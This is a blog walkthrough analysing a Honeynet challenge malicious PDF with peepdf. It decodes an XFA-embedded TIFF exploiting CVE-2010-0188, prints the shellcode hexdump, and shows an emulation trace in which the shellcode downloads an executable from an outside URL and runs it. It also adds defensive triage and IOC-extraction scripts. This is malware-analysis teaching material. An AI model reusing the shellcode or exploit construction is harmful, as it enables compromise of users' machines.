Analysing the Honeynet Project challenge PDF file with peepdf (II)
After the "useless" analysis of the fake objects in part I, we can now focus on the objects that will actually be parsed by the PDF reader (the tree below is the peepdf output, indented by reference depth):
/Catalog (27)
    dictionary (28)
        dictionary (22)
            dictionary (23)
                dictionary (22)
                /Annot (24)
                    dictionary (23)
                    /Page (25)
                        /Pages (26)
                            /Page (25)
        stream (21)
    /Pages (26)
If we take a look at the Catalog object...
PPDF> object 27
<< /AcroForm 28 0 R
/MarkInfo << /Marked true >>
/Pages 26 0 R
/Type /Catalog
/Lang en-us
/PageMode /UseAttachments >>
There is no trigger here (no /OpenAction), nor in the rest of the objects (no /AA), so it seems that the /AcroForm element has something to say; the /PageMode /UseAttachments entry also fits a document that carries an attachment. And the suspicious object 21 (/EmbeddedFile) is referenced from this interactive form:
PPDF> references to 21
[28]
PPDF> object 28
<< /DA /Helv 0 Tf 0 g
/Fields [ 22 0 R ]
/XFA [ template 21 0 R ] >>
In the form dictionary we can see that object 21 is the "template" packet of the XFA form (the /XFA array pairs packet names with the streams holding them) and that there is a reference to a field object (object 22). So we continue analysing the field objects:
PPDF> object 22
<< /V
/T topmostSubform[0]
/Kids [ 23 0 R ] >>
PPDF> object 23
<< /Parent 22 0 R
/Kids [ 24 0 R ]
/T Page1[0] >>
PPDF> object 24
<< /Parent 23 0 R
/T ImageField1[0]
/Ff 65536
/MK << /TP 1
/IF << /A [ 0.0 1.0 ] >> >>
/F 4
/Rect [ 107.385 705.147 188.385 709.087 ]
/Type /Annot
/FT /Btn
/DA /CourierStd 10 Tf 0 g
/Subtype /Widget
/TU ImageField1
/P 25 0 R >>
We arrive at the last field element, ImageField1: a button field (/FT /Btn) whose /Ff value is 65536, which is just bit 17 of the field flags, the Pushbutton flag that an image field normally carries. The interesting part is the content this field receives in the XFA packet (object 21), so let's take a look at it:
...
<field name="ImageField1" w="28.575mm" h="1.39mm" x="37.883mm" y="29.25mm">
<ui>
<imageEdit />
</ui>
</field>
<?templateDesigner expand 1?>
</subform>
<?templateDesigner expand 1?>
</subform>
<?templateDesigner FormTargetVersion 24?>
<?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?>
<?templateDesigner Zoom 94?>
</template>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
<xfa:data>
<topmostSubform>
<ImageField1 xfa:contentType="image/tif" href="">SUkqADggAACQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk
JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
...
Mmm... "SUkqAD" is the base64 encoding of "II*\0", the little-endian TIFF magic, so we have a TIFF image inside an XFA image field. CVE-2010-0188, the libtiff bug in Adobe Reader's TIFF handling? The content is base64-encoded, so we put it in a variable and decode it:
PPDF> set sh "SUkqADggAACQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ..."
PPDF> set output variable raw_sh
PPDF> decode variable sh b64
49 49 2a 00 38 20 00 00 90 90 90 90 90 90 90 90 |II*.8 ..........|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
...
90 90 90 90 90 90 90 90 90 90 90 90 90 31 c9 dd |.............1..|
c5 b8 53 2c 18 36 d9 74 24 f4 5f b1 66 31 47 18 |..S,.6.t$._.f1G.|
83 c7 04 03 47 14 e2 a6 c7 08 6c 02 2b e0 f6 2b |....G.....l.+..+|
77 f3 76 7f 82 6a 94 85 79 89 b1 92 81 6d be 14 |w.v..j..y....m..|
32 0b d8 4d 09 d6 e3 c4 17 b0 8d 04 f1 56 bf c1 |2..M.........V..|
84 6d d2 c8 16 9f 93 f8 f2 05 01 11 85 a7 bc 83 |.m..............|
98 c0 78 c9 ff 1c ac 60 55 54 9d b4 62 87 87 d2 |..x....`UT..b...|
11 ba ac 11 42 7a 58 ea 80 ea 5d d2 41 53 c3 06 |....BzX...].AS..|
0e 1b 3b 70 36 c9 ef 6e 66 53 95 d4 d0 d4 30 b0 |..;p6..nfS....0.|
4a 74 ba 52 1a 67 9b d7 86 d2 7b af 2d 78 23 5d |Jt.R.g....{.-x#]|
cb e7 8e 73 88 05 41 69 11 bd 8f c4 5e 5c 6f a7 |...s..Ai....^\o.|
69 c6 e9 de 70 a6 9d 2b 4b 3e 50 ce 97 ad 2d e3 |i...p..+K>P...-.|
80 12 dc a7 28 0b 86 bd 15 a6 76 1e b0 11 91 4c |....(.....v....L|
a0 44 0d 95 e0 6d 24 1c fc d4 35 e7 cb b1 77 62 |.D...m$...5...wb|
92 a0 12 49 d2 6c de 0f fe 09 82 4e fc b7 24 3a |...I.l.....N..$:|
a4 0e 9f f0 98 58 46 ca 42 49 c2 1b 46 0b 02 f2 |.....XF.BI..F...|
9e b2 54 69 8b 62 5c 6d 92 78 fe 45 ef 4e 35 33 |..Ti.b\m.x.E.N53|
bb 93 0a 89 40 63 21 b4 ec fa 8a 20 77 9b 2a 50 |....@c!.... w.*P|
9a aa 38 5e 9f f5 42 63 8b fa 57 71 d5 dd 54 68 |..8^..Bc..Wq..Th|
2c 01 4e 9f 4d 36 52 af 45 4b 97 a2 6c 5f 88 e4 |,.N.M6R.EK..l_..|
08 6e b9 e3 f7 8e c6 f1 91 8d d6 f5 4f e0 e8 1e |.n..........O...|
73 03 f7 79 59 02 f0 84 b7 1b fa 9d c0 37 1d b9 |s..yY........7..|
a8 24 35 cc 3f 42 3d b7 0c 60 17 1a 7a 99 6f 51 |.$5.?B=..`..z.oQ|
75 9e 6d 54 8c 80 7e 93 8d e7 e6 33 1a 6c 69 f9 |u.mT..~....3.li.|
cd a3 eb 91 7e db c5 01 ee 4d 7f a8 9e f4 0b 64 |....~....M.....d|
30 85 94 56 a3 10 74 c0 54 91 ef 62 d8 3c 93 25 |0..V..t.T..b.<.%|
7d d7 32 b5 ed 42 db 22 8b a3 57 c4 36 e3 e5 71 |}.2..B."..W.6..q|
d8 77 55 14 7b e4 1e 87 09 91 ce 22 96 3c 8f 90 |.wU.{......".<..|
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
PPDF> reset output
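The walk above (Catalog -> /AcroForm -> /Fields and /XFA, then pulling the image field's base64 value out of the XFA datasets, decoding it and spotting the TIFF header and the NOP sled) can be scripted. What follows is an added example written for this post, not peepdf code: it runs on a constructed, uncompressed PDF skeleton that mirrors objects 27, 28, 22, 23, 24 and 21 of the challenge file, with a stub TIFF in the image field that copies only the "II*\0" magic, the IFD offset 0x2038 and the first shellcode bytes from the hexdump above (the rest is filler). The regex-based object parser and the list of trigger keys are assumptions of the example; it handles neither object streams nor compressed streams, which peepdf does, so decompress first when pointing it at a real file.

```python
import base64
import re
import struct

# Constructed sample. Stub TIFF: only the "II*\0" magic, the first-IFD offset 0x2038
# and the first shellcode bytes (31 c9 dd c5 b8 53 2c 18) copy the hexdump above;
# the sled length, the 0xCC filler and the one-entry IFD are made up.
IFD_OFF = 0x2038
FAKE_SC = b"\x31\xc9\xdd\xc5\xb8\x53\x2c\x18" + b"\xcc" * 56
TIFF = (b"II*\x00" + struct.pack("<I", IFD_OFF)
        + b"\x90" * (IFD_OFF - 8 - len(FAKE_SC) - 16) + FAKE_SC + b"\x90" * 16
        + struct.pack("<HHHII", 1, 0x0100, 3, 1, 1)  # one IFD entry: ImageWidth = 1
        + struct.pack("<I", 0))                       # no next IFD
XFA = (b'<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">'
       b'<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">'
       b'<xfa:data><topmostSubform><ImageField1 xfa:contentType="image/tif" href="">'
       + base64.b64encode(TIFF)
       + b'</ImageField1></topmostSubform></xfa:data></xfa:datasets></xdp:xdp>')
# Uncompressed PDF skeleton with the roles of objects 27/28/22/23/24/21 above
# (no xref table: the toy parser keys on "N 0 obj" markers instead).
SAMPLE_PDF = (
    b"%PDF-1.6\n"
    b"27 0 obj\n<< /Type /Catalog /AcroForm 28 0 R /Pages 26 0 R >>\nendobj\n"
    b"28 0 obj\n<< /Fields [ 22 0 R ] /XFA [ (template) 21 0 R ] >>\nendobj\n"
    b"22 0 obj\n<< /T (topmostSubform[0]) /Kids [ 23 0 R ] >>\nendobj\n"
    b"23 0 obj\n<< /Parent 22 0 R /T (Page1[0]) /Kids [ 24 0 R ] >>\nendobj\n"
    b"24 0 obj\n<< /Parent 23 0 R /T (ImageField1[0]) /FT /Btn /Ff 65536"
    b" /Subtype /Widget /P 25 0 R >>\nendobj\n"
    b"21 0 obj\n<< /Length " + str(len(XFA)).encode() + b" >>\nstream\n"
    + XFA + b"\nendstream\nendobj\ntrailer\n<< /Root 27 0 R >>\n%%EOF\n")

OBJ_RE = re.compile(rb"(\d+) 0 obj\s*(.*?)\s*endobj", re.S)
REF_RE = re.compile(rb"(\d+) 0 R\b")
TRIGGER_RE = re.compile(rb"/(OpenAction|AA|JavaScript|JS|Launch|XFA)(?=[\s/\[<(>]|$)")
IMG_RE = re.compile(rb'<(\w+)[^>]*xfa:contentType="image/[^"]*"[^>]*>([^<]*)</\1>')

def load_objects(pdf):
    """Object number -> (dictionary, stream data); direct uncompressed objects only."""
    objs = {}
    for n, body in OBJ_RE.findall(pdf):
        m = re.search(rb"^(.*?)stream\r?\n(.*?)\r?\nendstream", body, re.S)
        objs[int(n)] = (m.group(1), m.group(2)) if m else (body, b"")
    return objs

def refs_after(d, key):
    """Object numbers referenced right after /key (single ref or array)."""
    m = re.search(rb"/" + key + rb"\s*(\[[^\]]*\]|\d+ 0 R)", d)
    return [int(n) for n in REF_RE.findall(m.group(1))] if m else []

def find_triggers(objs):
    """Objects carrying a key that can run content without a click."""
    hits = {}
    for num, (d, _) in objs.items():
        for key in TRIGGER_RE.findall(d):
            hits.setdefault(key.decode(), []).append(num)
    return hits

def walk_fields(objs, num, path=()):
    """Follow /Kids down the AcroForm field tree; yield (full name, /Ff) per leaf."""
    d = objs[num][0]
    t = re.search(rb"/T\s*\((.*?)\)", d)
    path += (t.group(1).decode(),) if t else ()
    kids = refs_after(d, b"Kids")
    if not kids:
        ff = re.search(rb"/Ff\s+(\d+)", d)
        yield ".".join(path), int(ff.group(1)) if ff else 0
    for k in kids:
        yield from walk_fields(objs, k, path)

def xfa_images(xml):
    """(field name, decoded bytes) for each image-typed value in the datasets."""
    return [(n.decode(), base64.b64decode(b)) for n, b in IMG_RE.findall(xml)]

def describe_tiff(blob):
    """TIFF magic, first-IFD offset and tags, longest NOP sled and the bytes after it."""
    info = {"size": len(blob), "is_tiff": blob[:4] in (b"II*\x00", b"MM\x00*")}
    if info["is_tiff"]:
        e = "<" if blob[:2] == b"II" else ">"
        ifd = info["ifd_offset"] = struct.unpack(e + "I", blob[4:8])[0]
        if ifd + 2 <= len(blob):  # an offset past EOF would itself be a finding
            n = struct.unpack(e + "H", blob[ifd:ifd + 2])[0]
            info["ifd_tags"] = [struct.unpack(e + "H", blob[o:o + 2])[0] for o in
                                range(ifd + 2, min(ifd + 2 + 12 * n, len(blob) - 1), 12)]
    sled = max(re.finditer(rb"\x90{16,}", blob), key=lambda m: m.end() - m.start(), default=None)
    if sled:
        info["sled"] = (sled.start(), sled.end() - sled.start())
        # shellcode candidate: everything between the sled and the next run of NOPs
        info["code_after_sled"] = re.match(rb"(.*?)(?:\x90{8,}|$)", blob[sled.end():], re.S).group(1)
    return info

def analyse(pdf):
    """Catalog -> /AcroForm -> /Fields and /XFA, the walk done by hand above."""
    objs = load_objects(pdf)
    root = int(re.search(rb"/Root\s+(\d+) 0 R", pdf).group(1))
    out = {"root": root, "triggers": find_triggers(objs), "fields": [], "images": {}}
    for form in refs_after(objs[root][0], b"AcroForm"):
        for f in refs_after(objs[form][0], b"Fields"):
            out["fields"].extend(walk_fields(objs, f))
        for x in refs_after(objs[form][0], b"XFA"):
            for name, blob in xfa_images(objs[x][1]):
                out["images"][name] = describe_tiff(blob)
    return out
```

analyse(SAMPLE_PDF) reports {'XFA': [28]} as the only trigger, the field path topmostSubform[0].Page1[0].ImageField1[0] with /Ff 65536, and for ImageField1 a valid little-endian TIFF header whose first IFD sits at 0x2038, an 8160-byte NOP sled starting at offset 8 and 64 non-NOP bytes right after it: the same buffer the post feeds to sctest by hand. The sled heuristic assumes the shellcode itself contains no run of eight 0x90 bytes; on a sample where it does, take the whole region up to the IFD instead.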
Now that we have the raw content in a variable, we emulate its execution with the sctest wrapper (libemu):
PPDF> sctest variable raw_sh
verbose = 0
Hook me Captain Cook!
userhooks.c:127 user_hook_ExitThread
ExitThread(32)
stepcount 9172
FARPROC WINAPI GetProcAddress (
HMODULE hModule = 0x7c800000 =>
none;
LPCSTR lpProcName = 0x0041767d =>
= "GetSystemDirectoryA";
) = 0x7c814eea;
FARPROC WINAPI GetProcAddress (
HMODULE hModule = 0x7c800000 =>
none;
LPCSTR lpProcName = 0x00417691 =>
= "WinExec";
) = 0x7c86136d;
FARPROC WINAPI GetProcAddress (
HMODULE hModule = 0x7c800000 =>
none;
LPCSTR lpProcName = 0x00417699 =>
= "ExitThread";
) = 0x7c80c058;
FARPROC WINAPI GetProcAddress (
HMODULE hModule = 0x7c800000 =>
none;
LPCSTR lpProcName = 0x004176a4 =>
= "LoadLibraryA";
) = 0x7c801d77;
HMODULE LoadLibraryA (
LPCTSTR lpFileName = 0x004176b1 =>
= "urlmon";
) = 0x7df20000;
FARPROC WINAPI GetProcAddress (
HMODULE hModule = 0x7df20000 =>
none;
LPCSTR lpProcName = 0x004176b8 =>
= "URLDownloadToFileA";
) = 0x7df7b0bb;
UINT GetSystemDirectory (
LPTSTR lpBuffer = 0x0012fe7c =>
none;
UINT uSize = 32;
) = 19;
HRESULT URLDownloadToFile (
LPUNKNOWN pCaller = 0x00000000 =>
none;
LPCTSTR szURL = 0x004176cb =>
= "http://blog.honeynet.org.my/forensic_challenge/the_real_malware.exe";
LPCTSTR szFileName = 0x0012fe7c =>
= "c:\WINDOWS\system32\a.exe";
DWORD dwReserved = 0;
LPBINDSTATUSCALLBACK lpfnCB = 0;
) = 0;
UINT WINAPI WinExec (
LPCSTR lpCmdLine = 0x0012fe7c =>
= "c:\WINDOWS\system32\a.exe";
UINT uCmdShow = 0;
) = 32;
void ExitThread (
DWORD dwExitCode = 32;
) = 0;
Done! Finally we have the trigger and the executed payload of the malicious PDF file: a crafted TIFF in an XFA image field (CVE-2010-0188) and a shellcode that resolves GetSystemDirectoryA, WinExec, ExitThread and LoadLibraryA from kernel32 (0x7c800000), loads urlmon to get URLDownloadToFileA, downloads the binary to c:\WINDOWS\system32\a.exe, launches it with WinExec and calls ExitThread. This shellcode also tries to download a binary and execute it, but this time the URL is the real one :)
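The trace above is easy to read once, but when triaging many samples you want the API chain and the network and file indicators pulled out automatically. The following is an added example, not part of peepdf or libemu: it parses a libemu sctest trace (the constructed input copies the relevant calls from the output above, abridged) into a list of calls with their pointer arguments replaced by the strings libemu resolved, and flags the download-and-execute pattern when the file passed to URLDownloadToFile is the same one later handed to WinExec. The line formats it matches are the ones visible in the trace above; other libemu hooks may print differently, and the API name sets are this example's own choice.

```python
import re

# Constructed input: the libemu sctest trace shown above, abridged to the calls
# that matter for triage (layout and values copied from that output).
SAMPLE_TRACE = r"""verbose = 0
Hook me Captain Cook!
stepcount 9172
FARPROC WINAPI GetProcAddress (
HMODULE hModule = 0x7c800000 =>
none;
LPCSTR lpProcName = 0x00417691 =>
= "WinExec";
) = 0x7c86136d;
HMODULE LoadLibraryA (
LPCTSTR lpFileName = 0x004176b1 =>
= "urlmon";
) = 0x7df20000;
FARPROC WINAPI GetProcAddress (
HMODULE hModule = 0x7df20000 =>
none;
LPCSTR lpProcName = 0x004176b8 =>
= "URLDownloadToFileA";
) = 0x7df7b0bb;
HRESULT URLDownloadToFile (
LPUNKNOWN pCaller = 0x00000000 =>
none;
LPCTSTR szURL = 0x004176cb =>
= "http://blog.honeynet.org.my/forensic_challenge/the_real_malware.exe";
LPCTSTR szFileName = 0x0012fe7c =>
= "c:\WINDOWS\system32\a.exe";
DWORD dwReserved = 0;
LPBINDSTATUSCALLBACK lpfnCB = 0;
) = 0;
UINT WINAPI WinExec (
LPCSTR lpCmdLine = 0x0012fe7c =>
= "c:\WINDOWS\system32\a.exe";
UINT uCmdShow = 0;
) = 32;
void ExitThread (
DWORD dwExitCode = 32;
) = 0;
"""

HEADER_RE = re.compile(r"^\s*(?:[\w*]+\s+)+(\w+)\s*\(\s*$")               # "RET [WINAPI] Name ("
ARG_RE = re.compile(r"^\s*[\w*]+\s+(\w+)\s*=\s*([^;=]+?)\s*(?:=>|;)\s*$")  # "TYPE name = value"
DEREF_RE = re.compile(r'^\s*=\s*"(.*)";\s*$')                              # pointer resolved to a string
END_RE = re.compile(r"^\s*\)\s*=\s*([^;]+);\s*$")                          # ") = retval;"

def parse_trace(text):
    """Turn a libemu call trace into [{'name', 'args', 'ret'}] in call order."""
    calls, cur, last = [], None, None
    for line in text.splitlines():
        if cur is None:
            if (m := HEADER_RE.match(line)):
                cur, last = {"name": m.group(1), "args": {}, "ret": None}, None
        elif (m := ARG_RE.match(line)):
            last = m.group(1)
            cur["args"][last] = m.group(2)
        elif (m := DEREF_RE.match(line)) and last:
            cur["args"][last] = m.group(1)   # keep the string, not the pointer
        elif (m := END_RE.match(line)):
            cur["ret"] = m.group(1).strip()
            calls.append(cur)
            cur = None
    return calls

DOWNLOADERS = {"URLDownloadToFile", "URLDownloadToFileA", "URLDownloadToFileW"}
EXECUTORS = {"WinExec", "CreateProcessA", "CreateProcessW", "ShellExecuteA"}

def extract_iocs(calls):
    """Resolved imports, loaded libraries, URLs, dropped paths, executed command
    lines, and whether a dropped file is later executed (download-and-execute)."""
    iocs = {"imports": [], "libraries": [], "urls": [], "dropped": [], "executed": []}
    for c in calls:
        a = c["args"]
        if c["name"] == "GetProcAddress":
            iocs["imports"].append(a.get("lpProcName"))
        elif c["name"].startswith("LoadLibrary"):
            iocs["libraries"].append(a.get("lpFileName"))
        elif c["name"] in DOWNLOADERS:
            iocs["urls"].append(a.get("szURL"))
            iocs["dropped"].append(a.get("szFileName"))
        elif c["name"] in EXECUTORS:
            iocs["executed"].append(a.get("lpCmdLine") or a.get("lpCommandLine"))
    executed = [x.lower() for x in iocs["executed"] if x]
    iocs["download_and_execute"] = any(p and p.lower() in executed for p in iocs["dropped"])
    return iocs
```

extract_iocs(parse_trace(SAMPLE_TRACE)) yields the URL, the dropped path c:\WINDOWS\system32\a.exe, the imports WinExec and URLDownloadToFileA, and download_and_execute set to True because the same path is passed to WinExec; the comparison is case-insensitive since Windows paths are.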
Previous part: Analysing the Honeynet Project challenge PDF file with peepdf (I)
Hey, hope you enjoyed the challenge :). It was designed to be fun. Btw, it's interesting enough to see many submitters got confused with /Root :).
Yeah! I really enjoyed it, it was interesting to see that behaviour :) Good work! ;)